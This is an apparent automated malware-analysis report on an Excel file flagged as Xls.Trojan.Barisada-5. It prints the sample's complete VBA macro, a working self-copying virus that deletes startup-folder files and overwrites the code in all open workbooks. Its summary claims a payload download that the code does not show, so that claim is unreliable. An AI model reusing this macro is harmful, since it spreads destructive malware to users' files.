MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Barisada-5. It contains VBA macros that appear to be responsible for downloading and executing a second-stage payload. The macro attempts to save a file named 'fusion.xls' in the application startup path and delete other files, suggesting a downloader or dropper functionality. The presence of VBA macros strongly suggests it was delivered as a spearphishing attachment.
Heuristics 2
-
ClamAV: Xls.Trojan.Barisada-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Barisada-5
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2831 bytes |
SHA-256: a9e4d135accc66135cf5a95064b93580e71b51fd7d57a30cd9c4592d37bc1025 |
|||
|
Detection
ClamAV:
Xls.Trojan.Barisada-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_windowdeactivate(ByVal wn As Excel.Window)
Dim ne_pyun As String
On Error Resume Next
ne_pyun = Dir(Application.StartupPath & "\fusion.xls") 'fusion°Ë»ç
If ne_pyun <> "fusion.xls" Then
Application.ScreenUpdating = False
Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\fusion.xls", FileFormat:=xlNormal, addtomru:=False
'Workbooks("fusion").IsAddin = True
Kill (Application.StartupPath & "\hjb.xls")
Kill (Application.StartupPath & "\874.xls")
Kill (Application.StartupPath & "\khm.xls")
End If
Dim i, lines, ne_pyun_rank As Integer
Dim codeform, ne_pyun_codes As String
For i = 1 To Workbooks.Count
lines = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
codeform = Null
codeform = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.lines(lines, 1)
If lines <> 0 Then
If codeform = "'hihihihohoho" Then
ne_pyun_codes = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.lines(1, lines)
ne_pyun_rank = i
End If
End If
Next i
Dim j, k As Integer
For j = 1 To Workbooks.Count
If j = ne_pyun_rank Then GoTo line100
For k = 1 To Workbooks(j).VBProject.VBComponents.Count
lines = Workbooks(j).VBProject.VBComponents.Item(k).CodeModule.CountOfLines
If lines <> 0 Then
Workbooks(j).VBProject.VBComponents.Item(k).CodeModule.DeleteLines 1, lines
End If
Next k
Workbooks(j).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.AddFromString (ne_pyun_codes)
line100:
Next j
If ne_pyun <> "fusion.xls" Then
Workbooks("fusion.xls").Close savechanges:=True
End If
End Sub
'hihihihohoho
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.